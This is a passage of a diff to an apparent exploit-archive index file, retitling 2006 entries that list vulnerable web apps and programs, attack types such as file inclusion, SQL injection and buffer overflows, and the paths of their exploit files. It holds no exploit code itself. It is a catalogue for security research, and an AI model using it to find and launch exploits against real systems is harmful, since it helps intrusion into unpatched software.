- (cookie) Remote Code Execution Exploit",2006-07-29,r00t,php,webapps,0 +2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - 'cookie' Remote Code Execution",2006-07-29,r00t,php,webapps,0 2088,platforms/php/webapps/2088.php,"ATutor 1.5.3.1 - (links) Blind SQL Injection",2006-07-30,rgod,php,webapps,0 2089,platforms/php/webapps/2089.txt,"Mambo User Home Pages Component 0.5 - Remote File Inclusion",2006-07-30,"Kurdish Security",php,webapps,0 2090,platforms/php/webapps/2090.txt,"Joomla com_bayesiannaivefilter Component 1.1 - Inclusion",2006-07-30,Pablin77,php,webapps,0 -2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 - Local Code Execution Exploit (French)",2006-07-30,NSRocket,windows,local,0 +2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 - Local Code Execution (French)",2006-07-30,NSRocket,windows,local,0 2092,platforms/php/webapps/2092.txt,"Joomla LMO Component 1.0b2 - Remote File Inclusion",2006-07-30,vitux,php,webapps,0 2094,platforms/windows/local/2094.c,"Open Cubic Player 2.6.0pre6 / 0.1.10_rc5 - Multiple Buffer Overflow Exploit",2006-07-31,"Luigi Auriemma",windows,local,0 2095,platforms/php/webapps/2095.txt,"PhpReactor 1.2.7pl1 - (pathtohomedir) Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 @@ -1804,34 +1805,34 @@ id,file,description,date,author,platform,type,port 2103,platforms/php/webapps/2103.txt,"k_shoutbox 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 2104,platforms/php/webapps/2104.txt,"k_fileManager 1.2 - (dwl_include_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2105,platforms/php/webapps/2105.php,"XMB 1.9.6 - (u2uid) SQL Injection (mq=off)",2006-08-01,rgod,php,webapps,0 -2106,platforms/osx/local/2106.pl,"Mac OSX 10.4.7 (x86) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 -2107,platforms/osx/local/2107.pl,"Mac OSX 10.4.7 (PPC) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 -2108,platforms/osx/local/2108.sh,"Mac OSX 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 +2106,platforms/osx/local/2106.pl,"Apple Mac OS X 10.4.7 (x86) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 +2107,platforms/osx/local/2107.pl,"Apple Mac OS X 10.4.7 (PPC) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 +2108,platforms/osx/local/2108.sh,"Apple Mac OS X 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 2109,platforms/php/webapps/2109.txt,"WoW Roster 1.70 - (/lib/phpBB.php) Remote File Inclusion",2006-08-02,|peti,php,webapps,0 -2110,platforms/php/webapps/2110.pm,"TWiki 4.0.4 - (Configure Script) Remote Code Execution Exploit (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0 -2111,platforms/osx/local/2111.pl,"Mac OSX 10.3.8 - (CF_CHARSET_PATH) Local Buffer Overflow Exploit (2)",2006-08-02,"Kevin Finisterre",osx,local,0 +2110,platforms/php/webapps/2110.pm,"TWiki 4.0.4 - (Configure Script) Remote Code Execution (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0 +2111,platforms/osx/local/2111.pl,"Apple Mac OS X 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow Exploit (2)",2006-08-02,"Kevin Finisterre",osx,local,0 2113,platforms/php/webapps/2113.txt,"SaveWeb Portal 3.4 - (SITE_Path) Remote File Inclusion",2006-08-02,"Mehmet Ince",php,webapps,0 2114,platforms/php/webapps/2114.htm,"TinyPHP Forum 3.6 - (makeAdmin) Remote Admin Maker Exploit",2006-08-02,SirDarckCat,php,webapps,0 2115,platforms/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0 2116,platforms/php/webapps/2116.txt,"TSEP 0.942 - (colorswitch.php) Remote File Inclusion",2006-08-02,beford,php,webapps,0 2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access Exploit",2006-08-03,rgod,php,webapps,0 -2118,platforms/php/webapps/2118.php,"myBloggie 2.1.4 - (trackback.php) Multiple SQL Injections",2006-08-07,rgod,php,webapps,0 -2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - (abs_path) Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 -2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - (abs_path) Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 +2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections",2006-08-07,rgod,php,webapps,0 +2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 +2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0 -2122,platforms/php/webapps/2122.txt,"ME Download System 1.3 - (header.php) Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 +2122,platforms/php/webapps/2122.txt,"ME Download System 1.3 - 'header.php' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 - (tpl.inc.php) Remote File Inclusion",2006-08-07,SirDarckCat,php,webapps,0 2124,platforms/windows/dos/2124.php,"XChat 2.6.7 - (Windows) Remote Denial of Service (PHP)",2006-08-07,ratboy,windows,dos,0 2125,platforms/php/webapps/2125.txt,"Joomla JD-Wiki Component 1.0.2 - Remote File Inclusion",2006-08-07,jank0,php,webapps,0 -2127,platforms/php/webapps/2127.txt,"Modernbill 1.6 - (config.php) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 -2128,platforms/php/webapps/2128.txt,"SAPID CMS 1.2.3.05 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0 -2129,platforms/php/webapps/2129.txt,"SAPID Blog Beta 2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 -2130,platforms/php/webapps/2130.txt,"SAPID Gallery 1.0 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 -2131,platforms/php/webapps/2131.txt,"SAPID Shop 1.2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 +2127,platforms/php/webapps/2127.txt,"ModernBill 1.6 - 'config.php' Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 +2128,platforms/php/webapps/2128.txt,"SAPID CMS 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,0 +2129,platforms/php/webapps/2129.txt,"SAPID Blog Beta 2 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 +2130,platforms/php/webapps/2130.txt,"SAPID Gallery 1.0 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 +2131,platforms/php/webapps/2131.txt,"SAPID Shop 1.2 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 2132,platforms/php/webapps/2132.txt,"phpAutoMembersArea 3.2.5 - (installed_config_file) Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2133,platforms/php/webapps/2133.txt,"Simple CMS - Administrator Authentication Bypass",2006-08-07,daaan,php,webapps,0 2134,platforms/php/webapps/2134.txt,"phpCC 4.2 Beta - (base_dir) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 -2135,platforms/php/webapps/2135.txt,"NEWSolved Lite 1.9.2 - (abs_path) Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 +2135,platforms/php/webapps/2135.txt,"NEWSolved Lite 1.9.2 - 'abs_path' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0 2137,platforms/php/webapps/2137.txt,"QuestCMS - 'main.php' Remote File Inclusion",2006-08-07,Crackers_Child,php,webapps,0 2138,platforms/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - SQL Injection",2006-08-07,ASIANEAGLE,asp,webapps,0 @@ -1847,7 +1848,7 @@ id,file,description,date,author,platform,type,port 2148,platforms/php/webapps/2148.txt,"phNNTP 1.3 - (article-raw.php) Remote File Inclusion",2006-08-08,Drago84,php,webapps,80 2149,platforms/php/webapps/2149.txt,"Hitweb 4.2.1 - (REP_INC) Remote File Inclusion",2006-08-08,Drago84,php,webapps,0 2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0 -2151,platforms/php/webapps/2151.txt,"Cwfm 0.9.1 - (Language) Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,80 +2151,platforms/php/webapps/2151.txt,"Cwfm 0.9.1 - 'Language' Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,80 2152,platforms/php/local/2152.php,"PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow (PoC)",2006-08-08,Heintz,php,local,0 2153,platforms/php/webapps/2153.txt,"Boite de News 4.0.1 - 'index.php' Remote File Inclusion",2006-08-09,"the master",php,webapps,0 2154,platforms/php/webapps/2154.txt,"PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,80 @@ -1857,12 +1858,12 @@ id,file,description,date,author,platform,type,port 2158,platforms/php/webapps/2158.txt,"TinyWebGallery 1.5 - (image) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0 2159,platforms/php/webapps/2159.pl,"PHPMyRing 4.2.0 - (view_com.php) SQL Injection",2006-08-09,simo64,php,webapps,80 2160,platforms/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflow (PoC)",2006-08-10,"Luigi Auriemma",windows,dos,0 -2161,platforms/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,80 +2161,platforms/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution",2006-08-10,simo64,php,webapps,80 2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-08-10,"H D Moore",windows,remote,445 2163,platforms/php/webapps/2163.txt,"phpwcms 1.1-RC4 - (spaw) Remote File Inclusion",2006-08-10,Morgan,php,webapps,80 -2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",windows,remote,0 +2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - (MDAC) Remote Code Execution (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",windows,remote,0 2165,platforms/php/webapps/2165.txt,"Spaminator 1.7 - (page) Remote File Inclusion",2006-08-10,Drago84,php,webapps,80 -2166,platforms/php/webapps/2166.txt,"Thatware 0.4.6 - (root_path) Remote File Inclusion",2006-08-10,Drago84,php,webapps,80 +2166,platforms/php/webapps/2166.txt,"Thatware 0.4.6 - 'ROOT_PATH' Remote File Inclusion",2006-08-10,Drago84,php,webapps,80 2167,platforms/php/webapps/2167.txt,"SaveWebPortal 3.4 - (page) Remote File Inclusion",2006-08-10,Bl0od3r,php,webapps,0 2168,platforms/php/webapps/2168.txt,"phpPrintAnalyzer 1.2 - Remote File Inclusion",2006-08-10,Cmaster4,php,webapps,80 2169,platforms/php/webapps/2169.txt,"Chaussette 080706 - (_BASE) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 @@ -1871,7 +1872,7 @@ id,file,description,date,author,platform,type,port 2172,platforms/php/webapps/2172.txt,"Mambo Remository Component 3.25 - Remote File Inclusion",2006-08-10,camino,php,webapps,0 2173,platforms/php/webapps/2173.txt,"MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - (session.php) Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,80 -2175,platforms/php/webapps/2175.txt,"WEBinsta CMS 0.3.1 - (templates_dir) Remote File Inclusion Exploit",2006-08-12,K-159,php,webapps,0 +2175,platforms/php/webapps/2175.txt,"WEBinsta CMS 0.3.1 - (templates_dir) Remote File Inclusion",2006-08-12,K-159,php,webapps,0 2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0 2177,platforms/php/webapps/2177.txt,"Joomla Webring Component 1.0 - Remote File Inclusion",2006-08-13,"Mehmet Ince",php,webapps,0 2178,platforms/php/webapps/2178.php,"XMB 1.9.6 Final - basename() Remote Command Execution Exploit",2006-08-13,rgod,php,webapps,0 @@ -1883,14 +1884,14 @@ id,file,description,date,author,platform,type,port 2184,platforms/php/webapps/2184.txt,"Mambo Peoplebook Component 1.0 - Remote File Inclusion",2006-08-14,Matdhule,php,webapps,0 2185,platforms/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow (3)",2006-08-14,K-sPecial,linux,remote,110 2186,platforms/asp/webapps/2186.txt,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (1)",2006-08-14,ASIANEAGLE,asp,webapps,0 -2187,platforms/php/webapps/2187.htm,"WEBInsta MM 1.3e - (absolute_path) Remote File Inclusion Exploit",2006-08-15,str0ke,php,webapps,0 +2187,platforms/php/webapps/2187.htm,"WEBInsta MM 1.3e - 'absolute_path' Remote File Inclusion",2006-08-15,str0ke,php,webapps,0 2188,platforms/php/webapps/2188.txt,"Discloser 0.0.4 - (fileloc) Remote File Inclusion",2006-08-15,"Arash RJ",php,webapps,0 2189,platforms/php/webapps/2189.txt,"WEBInsta CMS 0.3.1 - (users.php) Remote File Inclusion",2006-08-15,Yns,php,webapps,0 2190,platforms/php/webapps/2190.txt,"PHProjekt 5.1 - Multiple Remote File Inclusion",2006-08-15,Kacper,php,webapps,0 -2191,platforms/php/webapps/2191.txt,"dotProject 2.0.4 - (baseDir) Remote File Inclusion",2006-08-16,Kacper,php,webapps,0 +2191,platforms/php/webapps/2191.txt,"dotProject 2.0.4 - 'baseDir' Remote File Inclusion",2006-08-16,Kacper,php,webapps,0 2192,platforms/php/webapps/2192.txt,"OPT Max 1.2.0 - (CRM_inc) Remote File Inclusion",2006-08-16,Kacper,php,webapps,0 2193,platforms/linux/local/2193.php,"PHP 4.4.3 / 5.1.4 - (sscanf) Local Buffer Overflow",2006-08-16,Andi,linux,local,0 -2194,platforms/windows/dos/2194.pl,"Microsoft Windows - .png File IHDR Block Denial of Service PoC (1)",2006-08-16,Preddy,windows,dos,0 +2194,platforms/windows/dos/2194.pl,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (1)",2006-08-16,Preddy,windows,dos,0 2195,platforms/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0 2196,platforms/php/webapps/2196.txt,"Mambo CopperminePhotoGalery Component - Remote File Inclusion",2006-08-16,k1tk4t,php,webapps,0 2198,platforms/php/webapps/2198.php,"CubeCart 3.0.11 - (oid) Blind SQL Injection",2006-08-17,rgod,php,webapps,0 @@ -1899,13 +1900,13 @@ id,file,description,date,author,platform,type,port 2201,platforms/php/webapps/2201.txt,"POWERGAP 2003 - 's0x.php' Remote File Inclusion",2006-08-17,"Saudi Hackrz",php,webapps,0 2202,platforms/php/webapps/2202.txt,"Mambo mambelfish Component 1.1 - Remote File Inclusion",2006-08-17,mdx,php,webapps,0 2203,platforms/php/webapps/2203.txt,"Joomla com_jim Component 1.0.1 - Remote File Inclusion",2006-08-17,"Mehmet Ince",php,webapps,0 -2204,platforms/windows/dos/2204.c,"Microsoft Windows - .png File IHDR Block Denial of Service PoC (3)",2006-08-17,Preddy,windows,dos,0 +2204,platforms/windows/dos/2204.c,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (3)",2006-08-17,Preddy,windows,dos,0 2205,platforms/php/webapps/2205.txt,"Joomla Mosets Tree 1.0 - Remote File Inclusion",2006-08-17,Crackers_Child,php,webapps,0 2206,platforms/php/webapps/2206.txt,"Mambo phpShop Component 1.2 RC2b - File Include",2006-08-17,Cmaster4,php,webapps,0 2207,platforms/php/webapps/2207.txt,"Mambo a6mambocredits Component 1.0.0 - File Include",2006-08-17,Cmaster4,php,webapps,0 2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Denial of Service Crash Exploit",2006-08-18,Mr.Niega,windows,dos,0 2209,platforms/php/webapps/2209.txt,"Joomla Artlinks Component 1.0b4 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 -2210,platforms/windows/dos/2210.c,"Microsoft Windows - .png File IHDR Block Denial of Service PoC (2)",2006-08-18,vegas78,windows,dos,0 +2210,platforms/windows/dos/2210.c,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (2)",2006-08-18,vegas78,windows,dos,0 2211,platforms/php/webapps/2211.txt,"PHlyMail Lite 3.4.4 - (mod.listmail.php) Remote File Inclusion",2006-08-18,Kacper,php,webapps,0 2212,platforms/php/webapps/2212.txt,"phpCodeGenie 3.0.2 - (BEAUT_PATH) Remote File Inclusion",2006-08-18,Kacper,php,webapps,0 2213,platforms/php/webapps/2213.txt,"Mambo MamboWiki Component 0.9.6 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 @@ -1913,8 +1914,8 @@ id,file,description,date,author,platform,type,port 2215,platforms/php/webapps/2215.txt,"Joomla Kochsuite Component 0.9.4 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 2216,platforms/php/webapps/2216.txt,"Sonium Enterprise Adressbook 0.2 - (folder) Include",2006-08-18,"Philipp Niedziela",php,webapps,0 2217,platforms/php/webapps/2217.txt,"Mambo cropimage Component 1.0 - Remote File Inclusion",2006-08-19,"Mehmet Ince",php,webapps,0 -2218,platforms/php/webapps/2218.txt,"interact 2.2 - (CONFIG[BASE_PATH]) Remote File Inclusion",2006-08-19,Kacper,php,webapps,0 -2219,platforms/php/webapps/2219.php,"Joomla 1.0.10 - (poll component) Arbitrary Add Votes Exploit",2006-08-19,trueend5,php,webapps,0 +2218,platforms/php/webapps/2218.txt,"interact 2.2 - (CONFIG[base_path]) Remote File Inclusion",2006-08-19,Kacper,php,webapps,0 +2219,platforms/php/webapps/2219.php,"Joomla 1.0.10 - (poll Component) Arbitrary Add Votes Exploit",2006-08-19,trueend5,php,webapps,0 2220,platforms/php/webapps/2220.txt,"Tutti Nova 1.6 - (TNLIB_DIR) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 2221,platforms/php/webapps/2221.txt,"Fantastic News 2.1.3 - (script_path) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component 0.6b - Include",2006-08-19,mdx,php,webapps,0 @@ -1945,38 +1946,38 @@ id,file,description,date,author,platform,type,port 2247,platforms/php/webapps/2247.php,"MercuryBoard 1.1.4 - (User-Agent) SQL Injection",2006-08-23,rgod,php,webapps,0 2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - (start) SQL Injection",2006-08-23,SpiderZ,php,webapps,0 2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - (lvc_include_dir) Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0 -2250,platforms/php/webapps/2250.pl,"Integramod Portal 2.x - (functions_portal.php) Remote File Inclusion Exploit",2006-08-23,nukedx,php,webapps,0 -2251,platforms/php/webapps/2251.pl,"VistaBB 2.x - (functions_mod_user.php) Remote File Inclusion Exploit",2006-08-23,nukedx,php,webapps,0 +2250,platforms/php/webapps/2250.pl,"Integramod Portal 2.x - (functions_portal.php) Remote File Inclusion",2006-08-23,nukedx,php,webapps,0 +2251,platforms/php/webapps/2251.pl,"VistaBB 2.x - (functions_mod_user.php) Remote File Inclusion",2006-08-23,nukedx,php,webapps,0 2252,platforms/php/webapps/2252.pl,"Wikepage Opus 10 <= 2006.2a (lng) - Remote Command Execution Exploit",2006-08-24,Hessam-x,php,webapps,0 2253,platforms/php/webapps/2253.php,"Phaos 0.9.2 - basename() Remote Command Execution Exploit",2006-08-24,Kacper,php,webapps,0 2254,platforms/php/webapps/2254.txt,"PHPCOIN 1.2.3 - (session_set.php) Remote File Inclusion",2006-08-24,Timq,php,webapps,0 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps,0 -2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - (phpbb_root_path) Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0 +2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0 2257,platforms/php/webapps/2257.txt,"CliServ Web Community 0.65 - (cl_headers) Include",2006-08-25,Kacper,php,webapps,0 2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow",2006-08-26,muts,windows,remote,110 2259,platforms/php/webapps/2259.txt,"proManager 0.73 - (note.php) SQL Injection",2006-08-26,Kacper,php,webapps,0 -2260,platforms/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - (PSA_PATH) Remote File Inclusion Exploit",2006-08-27,Kacper,php,webapps,0 -2261,platforms/php/webapps/2261.php,"iziContents RC6 - GLOBALS[] Remote Code Execution Exploit",2006-08-27,Kacper,php,webapps,0 +2260,platforms/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - (PSA_PATH) Remote File Inclusion",2006-08-27,Kacper,php,webapps,0 +2261,platforms/php/webapps/2261.php,"iziContents RC6 - GLOBALS[] Remote Code Execution",2006-08-27,Kacper,php,webapps,0 2262,platforms/php/webapps/2262.php,"CMS Frogss 0.4 - (podpis) SQL Injection",2006-08-27,Kacper,php,webapps,0 2263,platforms/php/webapps/2263.txt,"Ay System CMS 2.6 - 'main.php' Remote File Inclusion",2006-08-27,SHiKaA,php,webapps,0 2264,platforms/windows/local/2264.htm,"VMware 5.5.1 - (ActiveX) Local Buffer Overflow",2006-08-27,c0ntex,windows,local,0 2265,platforms/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products - 'id' Arbitrary File Retrieval",2006-08-28,"Tan Chew Keong",cgi,webapps,0 2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple SQL Injections",2006-08-28,"Tan Chew Keong",cgi,webapps,0 -2268,platforms/php/webapps/2268.php,"e107 <= 0.75 - (GLOBALS Overwrite) Remote Code Execution Exploit",2006-08-28,rgod,php,webapps,0 +2268,platforms/php/webapps/2268.php,"e107 <= 0.75 - (GLOBALS Overwrite) Remote Code Execution",2006-08-28,rgod,php,webapps,0 2269,platforms/php/webapps/2269.txt,"Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote File Inclusion",2006-08-28,SHiKaA,php,webapps,0 -2270,platforms/php/webapps/2270.php,"phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution Exploit",2006-08-29,Kacper,php,webapps,0 +2270,platforms/php/webapps/2270.php,"phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution",2006-08-29,Kacper,php,webapps,0 2271,platforms/php/webapps/2271.txt,"PortailPHP mod_phpalbum 2.1.5 - (chemin) Remote File Inclusion",2006-08-29,"Mehmet Ince",php,webapps,0 2272,platforms/php/webapps/2272.txt,"MiniBill 1.22b - config[plugin_dir] Remote File Inclusion",2006-08-29,"the master",php,webapps,0 2273,platforms/php/webapps/2273.txt,"ExBB Italiano 0.2 - exbb[home_path] Remote File Inclusion",2006-08-29,SHiKaA,php,webapps,0 2274,platforms/linux/remote/2274.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)",2006-08-29,Expanders,linux,remote,0 -2275,platforms/php/webapps/2275.txt,"PHPECard 2.1.4 - (functions.php) Remote File Inclusion",2006-08-29,LeAk,php,webapps,0 -2276,platforms/windows/remote/2276.pm,"IBM eGatherer 3.20.0284.0 - (ActiveX) Remote Code Execution Exploit (Metasploit)",2006-08-29,"Francisco Amato",windows,remote,0 +2275,platforms/php/webapps/2275.txt,"PHPECard 2.1.4 - 'functions.php' Remote File Inclusion",2006-08-29,LeAk,php,webapps,0 +2276,platforms/windows/remote/2276.pm,"IBM eGatherer 3.20.0284.0 - (ActiveX) Remote Code Execution (Metasploit)",2006-08-29,"Francisco Amato",windows,remote,0 2277,platforms/windows/remote/2277.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (2)",2006-08-29,psylocn,windows,remote,0 -2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 - ZIP File Handling Local Buffer Overflow",2006-08-30,bratax,windows,local,0 +2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 - '.ZIP' File Handling Local Buffer Overflow",2006-08-30,bratax,windows,local,0 2279,platforms/php/webapps/2279.txt,"phpAtm 1.21 - (include_location) Remote File Inclusion",2006-08-30,KinSize,php,webapps,0 -2280,platforms/php/webapps/2280.pl,"Lanifex DMO 2.3b - (_incMgr) Remote File Inclusion Exploit",2006-08-30,Kacper,php,webapps,0 -2281,platforms/php/webapps/2281.pl,"Pheap CMS 1.1 - (lpref) Remote File Inclusion Exploit",2006-08-31,Kacper,php,webapps,0 +2280,platforms/php/webapps/2280.pl,"Lanifex DMO 2.3b - (_incMgr) Remote File Inclusion",2006-08-30,Kacper,php,webapps,0 +2281,platforms/php/webapps/2281.pl,"Pheap CMS 1.1 - (lpref) Remote File Inclusion",2006-08-31,Kacper,php,webapps,0 2282,platforms/php/webapps/2282.txt,"YACS CMS 6.6.1 - context[path_to_root] Remote File Inclusion",2006-08-31,MATASANOS,php,webapps,0 2283,platforms/windows/remote/2283.c,"TIBCO Rendezvous 7.4.11 - (add router) Remote Buffer Overflow Exploit",2006-09-01,"Andres Tarasco",windows,remote,0 2284,platforms/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 - Password Extractor Local Exploit",2006-09-01,"Andres Tarasco",windows,local,0 @@ -1993,8 +1994,8 @@ id,file,description,date,author,platform,type,port 2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 2296,platforms/asp/webapps/2296.txt,"SimpleBlog 2.3 - 'id' SQL Injection",2006-09-04,Vipsta/MurderSkillz,asp,webapps,0 2297,platforms/php/webapps/2297.pl,"Tr Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit",2006-09-04,DarkFig,php,webapps,0 -2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - (templates_dir) Remote Code Execution Exploit",2006-09-04,Kacper,php,webapps,0 -2299,platforms/php/webapps/2299.php,"PHP Proxima 6 - completepack Remote Code Execution Exploit",2006-09-04,Kacper,php,webapps,0 +2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - (templates_dir) Remote Code Execution",2006-09-04,Kacper,php,webapps,0 +2299,platforms/php/webapps/2299.php,"PHP Proxima 6 - completepack Remote Code Execution",2006-09-04,Kacper,php,webapps,0 2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 - (cmd) Remote Command Execution Exploit",2006-09-04,DarkFig,php,webapps,0 2301,platforms/php/webapps/2301.txt,"MySpeach 3.0.2 - (my_ms[root]) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 2302,platforms/windows/dos/2302.pl,"J. River Media Center 11.0.309 - Remote Denial of Service (PoC)",2006-09-05,n00b,windows,dos,0 @@ -2005,7 +2006,7 @@ id,file,description,date,author,platform,type,port 2307,platforms/php/webapps/2307.txt,"ACGV News 0.9.1 - 'article.php' Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 2308,platforms/php/webapps/2308.txt,"C-News 1.0.1 - (path) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 2309,platforms/php/webapps/2309.txt,"Sponge News 2.2 - (sndir) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 -2310,platforms/php/webapps/2310.php,"PhpCommander 3.0 - (upload) Remote Code Execution Exploit",2006-09-05,Kacper,php,webapps,0 +2310,platforms/php/webapps/2310.php,"PhpCommander 3.0 - (upload) Remote Code Execution",2006-09-05,Kacper,php,webapps,0 2311,platforms/php/webapps/2311.txt,"phpBB Shadow Premod 2.7.1 - Remote File Inclusion",2006-09-06,Kw3[R]Ln,php,webapps,0 2312,platforms/php/webapps/2312.txt,"BinGo News 3.01 - (bnrep) Remote File Inclusion",2006-09-06,SHiKaA,php,webapps,0 2313,platforms/php/webapps/2313.txt,"phpFullAnnu 5.1 - (repmod) Remote File Inclusion",2006-09-06,SHiKaA,php,webapps,0 @@ -2015,41 +2016,41 @@ id,file,description,date,author,platform,type,port 